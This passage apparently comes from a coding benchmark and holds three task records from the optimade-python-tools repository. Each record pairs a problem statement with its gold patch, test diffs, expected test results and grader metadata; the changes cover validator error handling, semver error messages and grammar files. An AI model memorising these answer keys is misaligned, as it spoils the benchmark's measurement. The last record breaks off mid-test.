Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? 
= missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=footer). Last update [790ab7d...ccb9cb5](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: Changed to low-priority as this is only an issue in cases where the validator *should* fail anyway, i.e. this PR is just an error message improvement, initially we thought it was bug fix that it was failing *because* of this
materials-consortia__optimade-python-tools-665
diff --git a/optimade/validator/utils.py b/optimade/validator/utils.py index ec07afbc..0f02604b 100644 --- a/optimade/validator/utils.py +++ b/optimade/validator/utils.py @@ -289,13 +289,7 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): else: result, msg = test_fn(validator, *args, **kwargs) - except json.JSONDecodeError as exc: - msg = ( - "Critical: unable to parse server response as JSON. " - f"{exc.__class__.__name__}: {exc}" - ) - raise exc - except (ResponseError, ValidationError) as exc: + except (json.JSONDecodeError, ResponseError, ValidationError) as exc: msg = f"{exc.__class__.__name__}: {exc}" raise exc except Exception as exc: diff --git a/optimade/validator/validator.py b/optimade/validator/validator.py index 3255b6ad..f67dd00c 100644 --- a/optimade/validator/validator.py +++ b/optimade/validator/validator.py @@ -922,18 +922,24 @@ class ImplementationValidator: for versioned base URLs. """ - expected_status_code = 200 + + # First, check that there is a versions endpoint in the appropriate place: + # If passed a versioned URL, then strip that version from + # the URL before looking for `/versions`. 
if re.match(VERSIONS_REGEXP, self.base_url_parsed.path) is not None: - expected_status_code = 404 + self.client.base_url = "/".join(self.client.base_url.split("/")[:-1]) response, _ = self._get_endpoint( - CONF.versions_endpoint, expected_status_code=expected_status_code + CONF.versions_endpoint, expected_status_code=200 ) - if expected_status_code == 200: - self._test_versions_endpoint_content( - response, request=CONF.versions_endpoint - ) + self._test_versions_endpoint_content(response, request=CONF.versions_endpoint) + + # If passed a versioned URL, first reset the URL of the client to the + # versioned one, then that this versioned URL does NOT host a versions endpoint + if re.match(VERSIONS_REGEXP, self.base_url_parsed.path) is not None: + self.client.base_url = self.base_url + self._get_endpoint(CONF.versions_endpoint, expected_status_code=404) @test_case def _test_versions_endpoint_content( @@ -1212,9 +1218,12 @@ class ImplementationValidator: if response.status_code not in expected_status_code: message = f"Request to '{request_str}' returned HTTP code {response.status_code} and not expected {expected_status_code}." - message += "\nError(s):" - for error in response.json().get("errors", []): - message += f'\n {error.get("title", "N/A")}: {error.get("detail", "N/A")} ({error.get("source", {}).get("pointer", "N/A")})' + message += "\nAdditional details:" + try: + for error in response.json().get("errors", []): + message += f'\n {error.get("title", "N/A")}: {error.get("detail", "N/A")} ({error.get("source", {}).get("pointer", "N/A")})' + except json.JSONDecodeError: + message += f"\n Could not parse response as JSON. Content type was {response.headers.get('content-type')!r}." raise ResponseError(message) return response, f"received expected response: {response}."
Validator changes: always check unversioned '/versions' and handle rich HTML pages This PR does two things: - Some services e.g. netlify have rich 404 pages which yield unhelpful error messages, those error messages are now improved. - Following discussion in #662, this PR always checks the existence of the unversioned `/versions` endpoint, even when passed a versioned URL
**Title** Improve validator handling of `/versions` endpoint and non‑JSON error responses **Problem** When a service’s base URL includes a version segment, the validator does not verify the required unversioned `/versions` endpoint, potentially missing compliance issues. Additionally, services that return rich HTML error pages cause the validator to raise obscure JSON parsing errors. **Root Cause** The validation logic only queried `/versions` for unversioned URLs and treated JSON decode failures as critical without providing context. **Fix / Expected Behavior** - Always request the unversioned `/versions` endpoint, even when a versioned base URL is supplied. - After confirming the unversioned endpoint, ensure that the versioned URL correctly returns a 404 for `/versions`. - Preserve the original client base URL throughout the checks. - Consolidate exception handling to provide a single, clearer error path. - When a response cannot be parsed as JSON, include the content‑type and a graceful message instead of a raw traceback. **Risk & Validation** - Verify that the client’s base URL is correctly restored after the unversioned check to avoid affecting subsequent tests. - Run the validator against services that intentionally serve HTML 404 pages to confirm improved error messages. - Ensure existing compliance tests still pass, confirming that the added 404 check does not introduce false negatives.
665
Materials-Consortia/optimade-python-tools
diff --git a/tests/validator/test_utils.py b/tests/validator/test_utils.py index 5b69199e..5c9e983e 100644 --- a/tests/validator/test_utils.py +++ b/tests/validator/test_utils.py @@ -164,17 +164,14 @@ def test_expected_failure_test_case(): assert validator.results.internal_failure_count == 0 assert output[0] is None - assert ( - output[1] - == "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" - ) + assert output[1] == "JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" assert ( validator.results.optional_failure_messages[-1][0] == "http://example.org/test_request - dummy_test_case - failed with error" ) assert ( validator.results.optional_failure_messages[-1][1] - == "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" + == "JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" )
[ "tests/validator/test_utils.py::test_expected_failure_test_case" ]
[ "tests/validator/test_utils.py::test_normal_test_case", "tests/validator/test_utils.py::test_optional_test_case", "tests/validator/test_utils.py::test_ignored_test_case", "tests/validator/test_utils.py::test_skip_optional_test_case", "tests/validator/test_utils.py::test_unexpected_failure_test_case", "tests/validator/test_utils.py::test_multistage_test_case", "tests/validator/test_utils.py::test_fail_fast_test_case", "tests/validator/test_utils.py::test_that_system_exit_is_fatal_in_test_case" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/validator/test_utils.py" }
{ "num_modified_files": 2, "num_modified_lines": 20, "pr_author": "ml-evs", "pr_labels": [ "bug: Something isn't working", "priority/low: Issue or PR with a consensus of low priority", "validator: Related to the OPTIMADE validator" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests that the validator always check the unversioned `/versions` endpoint and produce clearer error messages for non‑JSON (rich HTML) responses. The provided test changes check that the error message no longer includes the \"Critical:\" prefix, matching the intended improvement. No external URLs, naming expectations, or hidden domain knowledge are required, and the tests align with the described behavior, so the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f80c842ee8e015d41e5c59dcb807b4cd4045fde2
2021-06-09 08:44:33
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#845](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (22f6d55) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/97c0c892cd1011cc2c9119a3370cc83217e23f1e?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (97c0c89) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) ```diff @@ Coverage Diff @@ ## master #845 +/- ## ======================================= Coverage 92.70% 92.70% ======================================= Files 67 67 Lines 3699 3699 ======================================= Hits 3429 3429 Misses 270 270 ``` | Flag | Coverage Δ | | |---|---|---| | project | `92.70% <100.00%> (ø)` | | | validator | `92.70% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. 
| [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/models/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845/diff?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3V0aWxzLnB5) | `91.56% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=footer&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Last update [f80c842...22f6d55](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/845?src=pr&el=lastupdated&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-845
diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 5a47b795..8887656e 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -145,7 +145,10 @@ class SemanticVersion(str): @classmethod def validate(cls, v: str): if not cls.regex.match(v): - raise ValueError(f"Unable to validate version {v} as a semver.") + raise ValueError( + f"Unable to validate the version string {v!r} as a semantic version (expected <major>.<minor>.<patch>)." + "See https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string for more information." + ) return v
Improve semver validation error messsage Minor fix arising from some validation of AFLOW yesterday (that "1.0" is not a valid semver, and also that semver may not be well known as an abbreviation).
**Title** Improve the clarity of semantic version validation errors **Problem** When a version string fails semantic‑version validation, the raised error provides little guidance, leading to confusion (e.g., treating “1.0” as valid). Users need a more informative message that explains the required format. **Root Cause** The validation routine emits a generic error that does not describe the expected `<major>.<minor>.<patch>` pattern nor reference the semver specification. **Fix / Expected Behavior** - Error now explicitly states that the input must be a semantic version string. - The message shows the offending value in a quoted form for clarity. - It specifies the exact `<major>.<minor>.<patch>` structure required. - A link to the official semver specification is included for further guidance. **Risk & Validation** - Only the error text changes; exception type and validation logic remain unchanged, minimizing impact. - Ensure existing tests that check for version validation still pass with the updated message, updating expectations if necessary. - Manually verify that valid semantic versions are accepted and invalid ones raise the new, descriptive error.
845
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_baseinfo.py b/tests/models/test_baseinfo.py index 70ad3bfd..e7230f29 100644 --- a/tests/models/test_baseinfo.py +++ b/tests/models/test_baseinfo.py @@ -15,6 +15,8 @@ def test_available_api_versions(): ] bad_versions = [ {"url": "https://example.com/v0", "version": "v0.1.9"}, + {"url": "https://example.com/v0", "version": "0.1"}, + {"url": "https://example.com/v1", "version": "1.0"}, {"url": "https://example.com/v1.0.2", "version": "v1.0.2"}, {"url": "https://example.com/optimade/v1.2", "version": "v1.2.3"}, {"url": "https://example.com/v1.0.0", "version": "1.asdfaf.0-rc55"}, @@ -48,7 +50,8 @@ def test_available_api_versions(): with pytest.raises(ValueError) as exc: AvailableApiVersion(**data) assert ( - f"Unable to validate version {data['version']} as a semver" in exc.exconly() + f"Unable to validate the version string {data['version']!r} as a semantic version (expected <major>.<minor>.<patch>)" + in exc.exconly() ), f"SemVer validator not triggered as it should.\nException message: {exc.exconly()}.\nInputs: {data}" for data in bad_combos:
[ "tests/models/test_baseinfo.py::test_available_api_versions" ]
[]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_baseinfo.py" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "ml-evs", "pr_labels": [ "models: For issues related to the pydantic models directly", "priority/low: Issue or PR with a consensus of low priority" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests an improved semantic version validation error message but does not specify the exact wording, while the added test asserts a very specific message. The test therefore adds requirements not present in the issue description, indicating an ambiguous specification. This aligns with a B4 ambiguous spec situation rather than a clean A problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test expects a detailed error string that is not described in the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
38015610d404b044af263ff9eb0bf411cec5b38d
2021-07-20 17:08:48
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#879](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (ae51874) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/1f7ec8a96b4f9f93f3d4b3695aac2245851c33b1?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (1f7ec8a) will **increase** coverage by `0.00%`. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) ```diff @@ Coverage Diff @@ ## master #879 +/- ## ======================================= Coverage 92.74% 92.74% ======================================= Files 67 67 Lines 3763 3764 +1 ======================================= + Hits 3490 3491 +1 Misses 273 273 ``` | Flag | Coverage Δ | | |---|---|---| | project | `92.74% <100.00%> (+<0.01%)` | :arrow_up: | | validator | `92.74% <100.00%> (+<0.01%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. 
| [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/filterparser/lark\_parser.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879/diff?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvZmlsdGVycGFyc2VyL2xhcmtfcGFyc2VyLnB5) | `95.12% <100.00%> (+0.12%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=footer&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Last update [1f7ec8a...ae51874](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/879?src=pr&el=lastupdated&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). ml-evs: > There seem to have been added a lot of files in the folder testfiles. Was this intentional, or are these temporary files that should be removed? 
Never mind, I had read only the initial version of your message at the start of this PR. I think there's probably a better way of doing this so I will convert to a draft PR for now. Perhaps an `invoke` task that takes the examples from the spec repo and condenses them into one file with some tags for the examples which are expected to fail. ml-evs: Also apologies @markus1978, this PR touches one line of the elastic tests so you ended up getting pinged as a reviewer, feel free to ignore. ml-evs: Thought I'd have a bit more time to extend this, but its probably useful as-is. The tests still only check whether parsing does "something", not necessarily the right thing, but we "know" the grammar works so I can't justify spending more time on these tests.
materials-consortia__optimade-python-tools-879
diff --git a/optimade/filterparser/lark_parser.py b/optimade/filterparser/lark_parser.py index f1200ed0..ab327602 100644 --- a/optimade/filterparser/lark_parser.py +++ b/optimade/filterparser/lark_parser.py @@ -61,7 +61,10 @@ class LarkParser: """ - version = version if version else max(AVAILABLE_PARSERS.keys()) + if not version: + version = max( + _ for _ in AVAILABLE_PARSERS if AVAILABLE_PARSERS[_].get("default") + ) if version not in AVAILABLE_PARSERS: raise ParserError(f"Unknown parser grammar version: {version}") diff --git a/optimade/grammar/v0.9.5.lark b/optimade/grammar/v0.9.5.lark deleted file mode 100644 index 4ca776c9..00000000 --- a/optimade/grammar/v0.9.5.lark +++ /dev/null @@ -1,28 +0,0 @@ -// optimade v0.9.5 grammar spec in lark grammar format - -start: KEYWORD expression -KEYWORD: "filter=" -expression: [expression OR] term -term: [term AND] atom -atom: [NOT] comparison - | [NOT] "(" (andcomparison OR)* andcomparison ")" -andcomparison: [NOT] (NOT comparison AND)* comparison -comparison: VALUE OPERATOR VALUE -OPERATOR: /<=?|>=?|!?=/ -VALUE: CNAME | SIGNED_FLOAT | SIGNED_INT | ESCAPED_STRING -AND: /and/i -OR: /or/i -NOT: /not/i - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - -%import common.CNAME -%import common.SIGNED_FLOAT -%import common.SIGNED_INT -%import common.WS_INLINE -%ignore WS_INLINE diff --git a/optimade/grammar/v0.9.6.lark b/optimade/grammar/v0.9.6.lark deleted file mode 100644 index fde92c58..00000000 --- a/optimade/grammar/v0.9.6.lark +++ /dev/null @@ -1,33 +0,0 @@ -// optimade v0.9.6 grammar spec in lark grammar format - -start: KEYWORD expression -KEYWORD: "filter=" | "filter =" -expression: [expression CONJUNCTION] term -term: [term CONJUNCTION] atom | "(" [term CONJUNCTION] term - -atom: [NOT] comparison - -comparison: VALUE OPERATOR VALUE [")"] | VALUE OPERATOR "'" (combined)* "'" -OPERATOR: /<=?|>=?|!?=/ - -combined: VALUE ", 
" | VALUE "," | VALUE - -VALUE: CNAME | SIGNED_FLOAT | SIGNED_INT | ESCAPED_STRING - -CONJUNCTION: AND | OR -AND: /and/i -OR: /or/i -NOT: /not/i - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - -%import common.CNAME -%import common.SIGNED_FLOAT -%import common.SIGNED_INT -%import common.WS_INLINE -%ignore WS_INLINE diff --git a/optimade/grammar/v0.9.7.lark b/optimade/grammar/v0.9.7.lark deleted file mode 100644 index 8daeea41..00000000 --- a/optimade/grammar/v0.9.7.lark +++ /dev/null @@ -1,34 +0,0 @@ -// optimade v0.9.7 grammar spec in lark grammar format -// CHANGED start to not require KEYWORD filter= - -start: expression -expression: [expression CONJUNCTION] term -term: [term CONJUNCTION] atom | "(" [term CONJUNCTION] term ")" - -atom: [NOT] comparison - -comparison: VALUE OPERATOR VALUE | VALUE OPERATOR "'" combined "'" - -OPERATOR: /<=?|>=?|!?=/ - -combined: (VALUE ",")* VALUE - -VALUE: CNAME | SIGNED_FLOAT | SIGNED_INT | ESCAPED_STRING - -CONJUNCTION: AND | OR -AND: /and/i -OR: /or/i -NOT: /not/i - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - -%import common.CNAME -%import common.SIGNED_FLOAT -%import common.SIGNED_INT -%import common.WS_INLINE -%ignore WS_INLINE diff --git a/optimade/grammar/v0.10.1.lark b/optimade/grammar/v1.0.1.lark similarity index 100% rename from optimade/grammar/v0.10.1.lark rename to optimade/grammar/v1.0.1.lark diff --git a/optimade/grammar/v1.1.0.lark b/optimade/grammar/v1.1.0.lark new file mode 120000 index 00000000..c5582225 --- /dev/null +++ b/optimade/grammar/v1.1.0.lark @@ -0,0 +1,1 @@ +v1.0.0.lark \ No newline at end of file diff --git a/optimade/grammar/v0.10.0.lark b/optimade/grammar/v1.2.0.develop.lark similarity index 74% rename from optimade/grammar/v0.10.0.lark rename to optimade/grammar/v1.2.0.develop.lark index 
7a817514..12ec22c0 100644 --- a/optimade/grammar/v0.10.0.lark +++ b/optimade/grammar/v1.2.0.develop.lark @@ -1,4 +1,4 @@ -// optimade v0.10.0 grammar spec in lark grammar format +// optimade v1.2.0 (expected version) grammar spec in lark grammar format ?start: filter filter: expression* @@ -6,7 +6,11 @@ filter: expression* // Values constant: string | number // Note: support for property in value is OPTIONAL -value: string | number | property +value: string | bool | number | property + +// Note: not_implemented_string is only here to help Transformers +non_string_value: number | property +not_implemented_string: string // Note: support for OPERATOR in value_list is OPTIONAL value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* @@ -17,7 +21,7 @@ value_zip_list: value_zip ( "," value_zip )* // Expressions expression: expression_clause ( _OR expression_clause )* expression_clause: expression_phrase ( _AND expression_phrase )* -expression_phrase: [ NOT ] ( comparison | predicate_comparison | "(" expression ")" ) +expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) // Note: support for constant_first_comparison is OPTIONAL comparison: constant_first_comparison | property_first_comparison @@ -26,15 +30,16 @@ property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs - | set_zip_op_rhs ) + | set_zip_op_rhs + | length_op_rhs ) -constant_first_comparison: constant value_op_rhs +constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) value_op_rhs: OPERATOR value known_op_rhs: IS ( KNOWN | UNKNOWN ) -fuzzy_string_op_rhs: CONTAINS string - | STARTS [ WITH ] string - | ENDS [ WITH ] string +fuzzy_string_op_rhs: CONTAINS value + | STARTS [ WITH ] value + | ENDS [ WITH ] value // Note: support for ONLY in set_op_rhs is OPTIONAL // Note: support for [ OPERATOR ] in set_op_rhs is OPTIONAL // set_op_rhs: HAS [ ALL | ANY | ONLY] value_list @@ -43,8 +48,10 @@ set_op_rhs: HAS ( [ OPERATOR ] 
value | ANY value_list | ONLY value_list ) +// Note: support for [ OPERATOR ] is OPTIONAL +length_op_rhs: LENGTH [ OPERATOR ] signed_int + set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | ANY value_zip_list ) -predicate_comparison: LENGTH property OPERATOR value property_zip_addon: ":" property (":" property)* // Property syntax @@ -53,9 +60,15 @@ property: IDENTIFIER ( "." IDENTIFIER )* // String syntax string: ESCAPED_STRING +// Bool token syntax +bool: ( "TRUE" | "FALSE" ) + // Number token syntax number: SIGNED_INT | SIGNED_FLOAT +// Custom signed int +signed_int: SIGNED_INT + // Tokens // Boolean relations @@ -92,7 +105,6 @@ _STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - %import common.SIGNED_INT %import common.SIGNED_FLOAT
Tidy up old grammars, add a development grammar for v1.2 and update filterparser tests This PR does the following: - removes pre-1.0 grammars and their tests - Adds a v1.2 grammar that includes `TRUE` and `FALSE` tokens, - Adds links to a v1.1.0 and v1.0.1 grammars based on v1.0.0 - Unifies the testing of grammars such that each new grammar version inherits the tests from previous versions
**Title** Update grammar assets, introduce development grammar for v1.2, and refine default parser selection **Problem** Legacy grammar specifications for pre‑1.0 releases were still bundled, causing unnecessary maintenance overhead and potential version conflicts. The parser’s version resolution logic could select a non‑default grammar when multiple versions were available, leading to ambiguous behavior. **Root Cause** Outdated grammars were never pruned, and the version‑lookup routine always chose the highest numeric version without considering the designated default. **Fix / Expected Behavior** - Remove all obsolete pre‑1.0 grammar definitions and their associated tests. - Add a new development grammar for the upcoming v1.2 release, incorporating Boolean literals and enhanced operators. - Rename legacy grammar references to reflect the stable v1.0.x and v1.1.0 lineages. - Adjust the parser’s version selection to pick the highest version explicitly marked as the default. - Ensure that test suites automatically inherit and validate the updated grammars across versions. **Risk & Validation** - Verify that the parser loads the correct default grammar for typical use cases. - Run the full test matrix to confirm backward compatibility with earlier supported versions. - Manually test parsing of Boolean literals (`TRUE`, `FALSE`) and new length/operator constructs introduced in v1.2.
879
Materials-Consortia/optimade-python-tools
diff --git a/tests/filterparser/test_filterparser.py b/tests/filterparser/test_filterparser.py index 913fc707..99007b9d 100644 --- a/tests/filterparser/test_filterparser.py +++ b/tests/filterparser/test_filterparser.py @@ -1,5 +1,5 @@ -import os -from glob import glob +import abc +from typing import Tuple import pytest @@ -8,49 +8,35 @@ from lark import Tree from optimade.filterparser import LarkParser from optimade.server.exceptions import BadRequest -testfile_dir = os.path.join(os.path.dirname(__file__), "testfiles") +class BaseTestFilterParser(abc.ABC): + """Base class for parsing different versions of the grammar using `LarkParser`.""" + + version: Tuple[int, int, int] + variant: str = "default" -class TestParserV0_9_5: @pytest.fixture(autouse=True) def set_up(self): - self.test_filters = [] - for fn in sorted(glob(os.path.join(testfile_dir, "*.inp"))): - with open(fn) as f: - self.test_filters.append(f.read().strip()) - self.parser = LarkParser(version=(0, 9, 5)) - - def test_inputs(self): - for tf in self.test_filters: - if tf == "filter=number=0.0.1": - with pytest.raises(BadRequest): - self.parser.parse(tf) - else: - tree = self.parser.parse(tf) - assert isinstance(tree, Tree) - - def test_parser_version(self): - v = (0, 9, 5) - p = LarkParser(version=v) - assert isinstance(p.parse(self.test_filters[0]), Tree) - assert p.version == v + self.parser = LarkParser(version=self.version, variant=self.variant) def test_repr(self): assert repr(self.parser) is not None - self.parser.parse(self.test_filters[0]) + self.parse("band_gap = 1") assert repr(self.parser) is not None + def parse(self, inp): + return self.parser.parse(inp) -class 